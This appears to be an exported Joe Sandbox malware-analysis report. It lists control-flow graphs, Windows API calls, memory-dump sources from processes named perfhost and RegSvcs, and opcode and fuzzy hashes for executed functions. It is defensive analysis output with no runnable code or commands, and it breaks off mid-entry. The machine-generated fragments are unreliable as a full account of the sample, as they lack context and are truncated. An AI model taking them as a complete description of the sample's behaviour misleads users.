                                                                                                                                                                                control_flow_graph 13067 70171b-70172f 13068 701731-70173a 13067->13068 13069 70173c-701757 LoadLibraryExW 13067->13069 13072 701793-701795 13068->13072 13070 701780-701786 13069->13070 13071 701759-701762 GetLastError 13069->13071 13075 701788-701789 FreeLibrary 13070->13075 13076 70178f 13070->13076 13073 701771 13071->13073 13074 701764-70176f LoadLibraryExW 13071->13074 13077 701773-701775 13073->13077 13074->13077 13075->13076 13078 701791-701792 13076->13078 13077->13070 13079 701777-70177e 13077->13079 13078->13072 13079->13078
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00700B68,00000000,00000000,?,007016C2,00700B68,00000000,00000000,00000000,?,00701813,00000006,FlsSetValue), ref: 0070174D
                                                                                                                                                                                • GetLastError.KERNEL32(?,007016C2,00700B68,00000000,00000000,00000000,?,00701813,00000006,FlsSetValue,00715FC4,FlsSetValue,00000000,00000364,?,00700EBD), ref: 00701759
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007016C2,00700B68,00000000,00000000,00000000,?,00701813,00000006,FlsSetValue,00715FC4,FlsSetValue,00000000), ref: 00701767
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                • Opcode ID: fd1b445854dd6d816831a8bc474343e5a6bc916c7c54facc8c9a9e25cf342838
                                                                                                                                                                                • Instruction ID: 08988b1ac599ca519c12860495e4c727e55c909e4c4404c3bf45f9cf8c534bc8
                                                                                                                                                                                • Opcode Fuzzy Hash: fd1b445854dd6d816831a8bc474343e5a6bc916c7c54facc8c9a9e25cf342838
                                                                                                                                                                                • Instruction Fuzzy Hash: CD01DB36741227EBC7218B78EC88A6677D8AF45BA17615720F915D72D1DB28D800C7F4

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:16%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:18.1%
                                                                                                                                                                                Total number of Nodes:72
                                                                                                                                                                                Total number of Limit Nodes:12
                                                                                                                                                                                execution_graph 20607 19ab158 20608 19ab15c 20607->20608 20609 19ab1a3 20608->20609 20613 19ab358 20608->20613 20620 19ab2e0 20608->20620 20628 19ab368 20608->20628 20614 19ab35b 20613->20614 20616 19ab3aa 20613->20616 20614->20616 20635 19ab57f 20614->20635 20615 19ab380 20643 68e9360 20615->20643 20647 68e9353 20615->20647 20616->20609 20621 19ab35f 20620->20621 20622 19ab2ea 20620->20622 20625 19ab57f 9 API calls 20621->20625 20622->20609 20623 19ab380 20626 68e9353 4 API calls 20623->20626 20627 68e9360 4 API calls 20623->20627 20624 19ab3aa 20624->20609 20625->20623 20626->20624 20627->20624 20629 19ab369 20628->20629 20632 19ab57f 9 API calls 20629->20632 20630 19ab380 20633 68e9353 4 API calls 20630->20633 20634 68e9360 4 API calls 20630->20634 20631 19ab3aa 20631->20609 20632->20630 20633->20631 20634->20631 20636 19ab583 20635->20636 20637 19ab67e 20636->20637 20651 68e4560 20636->20651 20659 68e4944 20636->20659 20665 68e455f 20636->20665 20673 68e4331 20636->20673 20682 68e4340 20636->20682 20637->20615 20644 68e9382 20643->20644 20645 68e4560 4 API calls 20644->20645 20646 68e9494 20644->20646 20645->20646 20646->20616 20648 68e9361 20647->20648 20649 68e4560 4 API calls 20648->20649 20650 68e9494 20648->20650 20649->20650 20650->20616 20652 68e4561 LdrInitializeThunk 20651->20652 20658 68e4631 20652->20658 20654 68e46f1 20654->20637 20655 68e493c LdrInitializeThunk 20655->20654 20657 68e4340 2 API calls 20657->20658 20658->20654 20658->20655 20658->20657 20664 68e47fb 20659->20664 20660 68e493c LdrInitializeThunk 20662 68e4a99 20660->20662 20662->20637 20663 68e4340 2 API calls 20663->20664 20664->20660 20664->20663 20666 68e4596 LdrInitializeThunk 20665->20666 20667 68e4591 20665->20667 20669 68e4631 20666->20669 20667->20666 20668 68e46f1 20668->20637 20669->20668 20670 68e493c LdrInitializeThunk 20669->20670 20672 68e4340 2 API calls 20669->20672 20670->20668 20672->20669 20674 68e4352 20673->20674 20675 68e4357 20673->20675 20674->20637 20675->20674 20676 68e4596 LdrInitializeThunk 20675->20676 20681 68e4631 20676->20681 20677 68e46f1 20677->20637 20678 68e493c LdrInitializeThunk 20678->20677 20680 68e4340 2 API calls 20680->20681 20681->20677 20681->20678 20681->20680 20683 68e4352 20682->20683 20684 68e4357 20682->20684 20683->20637 20684->20683 20685 68e4596 LdrInitializeThunk 20684->20685 20688 68e4631 20685->20688 20686 68e46f1 20686->20637 20687 68e4a81 LdrInitializeThunk 20687->20686 20688->20686 20688->20687 20689 68e4c29 20690 68e4c37 20689->20690 20692 68e4c3d 20689->20692 20691 68e4340 2 API calls 20690->20691 20690->20692 20694 68e4fbe 20690->20694 20691->20694 20693 68e4340 2 API calls 20693->20694 20694->20692 20694->20693

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 019A5978 Relevance: 9.7, Strings: 7, Instructions: 917COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o]q$(o]q$(o]q$(o]q$,aq$,aq$Haq
                                                                                                                                                                                • API String ID: 0-105717579
                                                                                                                                                                                • Opcode ID: 82fd635e510f9925e6016e531fa304961868f5500f9a5d84e633b56930bb34ba
                                                                                                                                                                                • Instruction ID: 9b3ea091d47a88d79e3ffc8d410fc6e258c7b7ec7d39e9f6127f470bce50e59b
                                                                                                                                                                                • Opcode Fuzzy Hash: 82fd635e510f9925e6016e531fa304961868f5500f9a5d84e633b56930bb34ba
                                                                                                                                                                                • Instruction Fuzzy Hash: D7728070A002199FDB15CF69C884AAEBBF6FF88301F558469E909DB395DB34DC46CB90
                                                                                                                                                                                Function 019A4348 Relevance: 6.4, Strings: 5, Instructions: 180COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 411 19a4348-19a4368 413 19a436a 411->413 414 19a436f-19a444c call 19a3168 call 19a2c88 411->414 413->414 424 19a444e 414->424 425 19a4453-19a4474 call 19a4613 414->425 424->425 426 19a447a-19a4485 425->426 427 19a448c-19a4490 426->427 428 19a4487 426->428 429 19a4492-19a4493 427->429 430 19a4495-19a449c 427->430 428->427 433 19a44b4-19a44f8 429->433 431 19a449e 430->431 432 19a44a3-19a44b1 430->432 431->432 432->433 437 19a455e-19a4575 433->437 439 19a44fa-19a4510 437->439 440 19a4577-19a459c 437->440 443 19a453a 439->443 444 19a4512-19a451e 439->444 449 19a459e-19a45b3 440->449 450 19a45b4 440->450 448 19a4540-19a455d 443->448 446 19a4528-19a452e 444->446 447 19a4520-19a4526 444->447 451 19a4538 446->451 447->451 448->437 449->450 452 19a45b5 450->452 451->448 452->452
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                                                                • Opcode ID: 8695765e983f064848bfc89ecee55f12d0cab717b9accf11fa79002ded865ac7
                                                                                                                                                                                • Instruction ID: 5d2f69892ea100629387e7f1812bba3728eb62c06fc2d3217bb847d4ed575df7
                                                                                                                                                                                • Opcode Fuzzy Hash: 8695765e983f064848bfc89ecee55f12d0cab717b9accf11fa79002ded865ac7
                                                                                                                                                                                • Instruction Fuzzy Hash: D081B274E00218CFDB18CFAAD984A9DBBF2BF88301F54D069E819AB365DB749945CF50
                                                                                                                                                                                Function 019A4328 Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1440 19a4328-19a4332 1442 19a4339-19a433a 1440->1442 1443 19a4334-19a4338 1440->1443 1444 19a433c 1442->1444 1445 19a4341-19a4342 1442->1445 1443->1442 1444->1445 1446 19a4349-19a4368 1445->1446 1447 19a4344-19a4348 1445->1447 1449 19a436a 1446->1449 1450 19a436f-19a444c call 19a3168 call 19a2c88 1446->1450 1447->1446 1449->1450 1460 19a444e 1450->1460 1461 19a4453-19a4474 call 19a4613 1450->1461 1460->1461 1462 19a447a-19a4485 1461->1462 1463 19a448c-19a4490 1462->1463 1464 19a4487 1462->1464 1465 19a4492-19a4493 1463->1465 1466 19a4495-19a449c 1463->1466 1464->1463 1469 19a44b4-19a44f8 1465->1469 1467 19a449e 1466->1467 1468 19a44a3-19a44b1 1466->1468 1467->1468 1468->1469 1473 19a455e-19a4575 1469->1473 1475 19a44fa-19a4510 1473->1475 1476 19a4577-19a459c 1473->1476 1479 19a453a 1475->1479 1480 19a4512-19a451e 1475->1480 1485 19a459e-19a45b3 1476->1485 1486 19a45b4 1476->1486 1484 19a4540-19a455d 1479->1484 1482 19a4528-19a452e 1480->1482 1483 19a4520-19a4526 1480->1483 1487 19a4538 1482->1487 1483->1487 1484->1473 1485->1486 1488 19a45b5 1486->1488 1487->1484 1488->1488
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0o@p$PH]q$PH]q
                                                                                                                                                                                • API String ID: 0-2023588385
                                                                                                                                                                                • Opcode ID: 3218d32cad6d007a8362149f4db2e0a0d71069680da32d5f34ec4e0704f433b8
                                                                                                                                                                                • Instruction ID: 497c97c658f08fab779223238bc678c6aad51daf93c8e19aa42e2abb8d30c78a
                                                                                                                                                                                • Opcode Fuzzy Hash: 3218d32cad6d007a8362149f4db2e0a0d71069680da32d5f34ec4e0704f433b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A61E670E002489FDB18CFAAD984A9DBBF6FF89300F54C069E418AB365DB749945CF50
                                                                                                                                                                                Function 019A9048 Relevance: 3.4, Strings: 2, Instructions: 909COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o]q$4']q
                                                                                                                                                                                • API String ID: 0-176817397
                                                                                                                                                                                • Opcode ID: ceb7ad81aa5e9fb11c3ff86baadfacc0324e5651e373c0822661c1e33c357084
                                                                                                                                                                                • Instruction ID: 3dbc71241002737872ce3ba134e6457c55086cd8b09b31a4570874702d840442
                                                                                                                                                                                • Opcode Fuzzy Hash: ceb7ad81aa5e9fb11c3ff86baadfacc0324e5651e373c0822661c1e33c357084
                                                                                                                                                                                • Instruction Fuzzy Hash: 78828F34A0020ADFCB15CF68C594AAEBBF6FF88314F55855AE9099B361D730ED49CB90
                                                                                                                                                                                Function 068E4560 Relevance: 3.4, APIs: 2, Instructions: 357libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2197 68e4560-68e458f 2199 68e4596-68e462c LdrInitializeThunk 2197->2199 2200 68e4591 2197->2200 2201 68e46cb-68e46d1 2199->2201 2200->2199 2202 68e46d7-68e46ef 2201->2202 2203 68e4631-68e4644 2201->2203 2206 68e4703-68e4716 2202->2206 2207 68e46f1-68e46fe 2202->2207 2204 68e464b-68e469c 2203->2204 2205 68e4646 2203->2205 2224 68e469e-68e46ac 2204->2224 2225 68e46af-68e46c1 2204->2225 2205->2204 2208 68e471d-68e4739 2206->2208 2209 68e4718 2206->2209 2210 68e4a99-68e4b97 2207->2210 2212 68e473b 2208->2212 2213 68e4740-68e4764 2208->2213 2209->2208 2215 68e4b9f-68e4ba9 2210->2215 2216 68e4b99-68e4b9e 2210->2216 2212->2213 2220 68e476b-68e479d 2213->2220 2221 68e4766 2213->2221 2216->2215 2229 68e479f 2220->2229 2230 68e47a4-68e47e6 2220->2230 2221->2220 2224->2202 2226 68e46c8 2225->2226 2227 68e46c3 2225->2227 2226->2201 2227->2226 2229->2230 2232 68e47ed-68e47f6 2230->2232 2233 68e47e8 2230->2233 2234 68e4a1e-68e4a24 2232->2234 2233->2232 2235 68e4a2a-68e4a3d 2234->2235 2236 68e47fb-68e4820 2234->2236 2239 68e4a3f 2235->2239 2240 68e4a44-68e4a5f 2235->2240 2237 68e4827-68e485e 2236->2237 2238 68e4822 2236->2238 2248 68e4865-68e4897 2237->2248 2249 68e4860 2237->2249 2238->2237 2239->2240 2241 68e4a66-68e4a7a 2240->2241 2242 68e4a61 2240->2242 2246 68e4a7c 2241->2246 2247 68e4a81-68e4a97 LdrInitializeThunk 2241->2247 2242->2241 2246->2247 2247->2210 2251 68e48fb-68e490e 2248->2251 2252 68e4899-68e48be 2248->2252 2249->2248 2253 68e4915-68e493a 2251->2253 2254 68e4910 2251->2254 2255 68e48c5-68e48f3 2252->2255 2256 68e48c0 2252->2256 2259 68e493c-68e493d 2253->2259 2260 68e4949-68e4981 2253->2260 2254->2253 2255->2251 2256->2255 2259->2235 2261 68e4988-68e49e9 call 68e4340 2260->2261 2262 68e4983 2260->2262 2268 68e49eb 2261->2268 2269 68e49f0-68e4a14 2261->2269 2262->2261 2268->2269 2272 68e4a1b 2269->2272 2273 68e4a16 2269->2273 2272->2234 2273->2272
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: cf5e8bf3626268bf64488eff88d3deaede931bbb7988829461c28b2f784ba36a
                                                                                                                                                                                • Instruction ID: bdca13474183d2dcbebd02dcab00cc2e252696887ca207787d0d408a1cc49e36
                                                                                                                                                                                • Opcode Fuzzy Hash: cf5e8bf3626268bf64488eff88d3deaede931bbb7988829461c28b2f784ba36a
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF1D274E01218CFDB54DFA9D884B9DBBF2BF89304F5481A9E808AB355DB34A985CF50
                                                                                                                                                                                Function 019A2DD1 Relevance: 2.9, Strings: 2, Instructions: 417COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2274 19a2dd1-19a2ded 2275 19a2def-19a2df1 2274->2275 2276 19a2df6-19a2e06 2274->2276 2277 19a3094-19a309b 2275->2277 2278 19a2e08 2276->2278 2279 19a2e0d-19a2e1d 2276->2279 2278->2277 2281 19a307b-19a3089 2279->2281 2282 19a2e23-19a2e31 2279->2282 2285 19a309c-19a315e 2281->2285 2287 19a308b-19a308f call 19a02a8 2281->2287 2282->2285 2286 19a2e37 2282->2286 2363 19a3160-19a3161 2285->2363 2364 19a3165-19a3182 2285->2364 2286->2285 2288 19a2f3a-19a2f62 2286->2288 2289 19a2e7b-19a2e9d 2286->2289 2290 19a2e3e-19a2e50 2286->2290 2291 19a2fd6-19a2ffc 2286->2291 2292 19a2f14-19a2f35 2286->2292 2293 19a2f94-19a2fd1 2286->2293 2294 19a2e55-19a2e76 2286->2294 2295 19a2ec8-19a2ee9 2286->2295 2296 19a2eee-19a2f0f 2286->2296 2297 19a302f-19a304a call 19a02b8 2286->2297 2298 19a306f-19a3079 2286->2298 2299 19a304c-19a306d call 19a18c8 2286->2299 2300 19a2ea2-19a2ec3 2286->2300 2301 19a3001-19a302d 2286->2301 2302 19a2f67-19a2f8f 2286->2302 2287->2277 2288->2277 2289->2277 2290->2277 2291->2277 2292->2277 2293->2277 2294->2277 2295->2277 2296->2277 2297->2277 2298->2277 2299->2277 2300->2277 2301->2277 2302->2277 2363->2364 2366 19a3189-19a3291 call 19a16c8 call 19a16d8 call 19a16e8 call 19a16f8 call 19a02c4 2364->2366 2367 19a3184 2364->2367 2385 19a3297-19a3327 2366->2385 2367->2366
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xaq$$]q
                                                                                                                                                                                • API String ID: 0-1280934391
                                                                                                                                                                                • Opcode ID: 995fb3619511aa8ec60c49f005aaade6e393c5569322372bb89c42163ecb2f81
                                                                                                                                                                                • Instruction ID: d9b9405fe173fd77380b6bdeb9f09b40a9c31081514ac9d84dc871f3e16103e4
                                                                                                                                                                                • Opcode Fuzzy Hash: 995fb3619511aa8ec60c49f005aaade6e393c5569322372bb89c42163ecb2f81
                                                                                                                                                                                • Instruction Fuzzy Hash: 05F15034F00218DFCB18DFB9D8545AEBBB6BF88710B548869E40AEB354DF359906CB91
                                                                                                                                                                                Function 068E4340 Relevance: 1.8, APIs: 1, Instructions: 265libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 89255fb8a1eba9d82317e4d79f101befa887ce7ef145e918bc7c599ea7455414
                                                                                                                                                                                • Instruction ID: eb8d56caaeb9dd58ec1f62f26598ce7ca136ea60eeb16a91770a248b2b5961f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 89255fb8a1eba9d82317e4d79f101befa887ce7ef145e918bc7c599ea7455414
                                                                                                                                                                                • Instruction Fuzzy Hash: D191D271F002198FDB68DFB9C8556AEBBF6AF89314F10856AD409E7395DB308D06CB90
                                                                                                                                                                                Function 068E455F Relevance: 1.6, APIs: 1, Instructions: 86libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a34bac3e7e354a3151dfa7509df08b72ffa780d93c7b99897e05c381a75c40bb
                                                                                                                                                                                • Instruction ID: 7829189df5e31dd826e7df2454e23b56f4a5cb4794e0fe873683579fbbece17d
                                                                                                                                                                                • Opcode Fuzzy Hash: a34bac3e7e354a3151dfa7509df08b72ffa780d93c7b99897e05c381a75c40bb
                                                                                                                                                                                • Instruction Fuzzy Hash: C53104B1D016189BEB28CFAAD9847DDFBF2BF89314F14C12AD418A72A4DB740945CF00
                                                                                                                                                                                Function 068E9360 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 436d3d5609368bf37968738d15286db2fde9a9625bd89a7fcfe592661e719bcb
                                                                                                                                                                                • Instruction ID: a38a6067447b270a78568673ceda2a288f6e4351966847b3a893de104340e4be
                                                                                                                                                                                • Opcode Fuzzy Hash: 436d3d5609368bf37968738d15286db2fde9a9625bd89a7fcfe592661e719bcb
                                                                                                                                                                                • Instruction Fuzzy Hash: 99E1C074E01218CFEB64DFA5D944B9DBBB2BF89304F2080AAD808A7394DB755E85CF51
                                                                                                                                                                                Function 019AB57F Relevance: .3, Instructions: 282COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bbf3540ab467c2a3cc2f281758b872b09a3d8983ef6d11a39d3cb342f6f1d2a6
                                                                                                                                                                                • Instruction ID: a453995be3a68f06e66ecac35ba4c7d38076681e28f01f305d8273c5ed93615e
                                                                                                                                                                                • Opcode Fuzzy Hash: bbf3540ab467c2a3cc2f281758b872b09a3d8983ef6d11a39d3cb342f6f1d2a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 78D1B074E00218CFEB14DFA5D984BADBBB6EF89304F6080A9D809A7355DB359E85CF50
                                                                                                                                                                                Function 019ABDE8 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f53486616f5c257a64df0e26a9281dab6680bb1ad5ed91d4d35c3fff34aa8ae8
                                                                                                                                                                                • Instruction ID: 231e6658542a4a0ff80c9f7e62c39fe94aea36c6d7789d288860471424fc19b3
                                                                                                                                                                                • Opcode Fuzzy Hash: f53486616f5c257a64df0e26a9281dab6680bb1ad5ed91d4d35c3fff34aa8ae8
                                                                                                                                                                                • Instruction Fuzzy Hash: FAA11670D002088FEB14DFA9C958BDDBBB5FF49300F648269E509AB392DB749985CF91
                                                                                                                                                                                Function 019ABDF8 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ef9e610d577760e469ca4f46a99a8596551676d150bb47651df0e7f8dfdab482
                                                                                                                                                                                • Instruction ID: 657c09c5684d025067882dbe0e84cfedb9318dc4febd06e692ea6ada136ca51b
                                                                                                                                                                                • Opcode Fuzzy Hash: ef9e610d577760e469ca4f46a99a8596551676d150bb47651df0e7f8dfdab482
                                                                                                                                                                                • Instruction Fuzzy Hash: E8A10370D002088FEB14DFA9C598BDDBBB5BF89301F248269E509AB391DB749985CF51
                                                                                                                                                                                Function 019AC13F Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a60b2aedd27d8d468c6a6c52b414585299aff457110da75f4909d920eb02ab56
                                                                                                                                                                                • Instruction ID: f739c3cfd885c615b1c357841a6c75620c23a09d78d99453358d29e1592a365e
                                                                                                                                                                                • Opcode Fuzzy Hash: a60b2aedd27d8d468c6a6c52b414585299aff457110da75f4909d920eb02ab56
                                                                                                                                                                                • Instruction Fuzzy Hash: 0891F370900218CFEB14DFA8C988BDDBBB5FF49301F248269E409AB392DB759985CF54
                                                                                                                                                                                Function 019A66B8 Relevance: 10.5, Strings: 8, Instructions: 474COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
